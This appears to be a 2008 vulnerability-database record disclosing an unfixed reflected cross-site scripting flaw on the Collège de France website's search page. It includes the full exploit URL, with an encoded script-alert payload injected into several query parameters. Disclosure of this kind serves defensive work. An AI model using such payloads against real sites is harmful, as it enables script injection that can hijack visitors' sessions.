Unfixed XSS vulnerability at www.college-de-france.fr

2008-01-07T00:00:00
ID XSSED:44148
Type xssed
Reporter Stacker
Modified 2008-07-07T00:00:00

Description

Security researcher Stacker, has submitted on 01/07/2008 a cross-site-scripting (XSS) vulnerability affecting www.college-de-france.fr, which at the time of submission ranked 313082 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/07/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.college-de-france.fr/default/EN/all/college/searchresult_default.jsp?query=((%3Cscript%3Ealert(%27Stacker%27)%3C%2Fscript%3E)+OR+(title%3A%22%3Cscript%3Ealert(%27Stacker%27)%3C%2Fscript%3E%22)+OR+(description%3A%22%3Cscript%3Ealert(%27Stacker%27)%3C%2Fscript%3E%22))+AND+(+SITENAME%3A%22college%22+AND+NOT+(TYPE%3A%22AGENDA%22)+)&more=(+SITENAME%3A%22college%22+AND+NOT+(TYPE%3A%22AGENDA%22)+)&fields=&meta=&group=all&maxresults=25&order=&fulltext=%3Cscript%3Ealert(%27Stacker%27)%3C%2Fscript%3E&x=0&y=0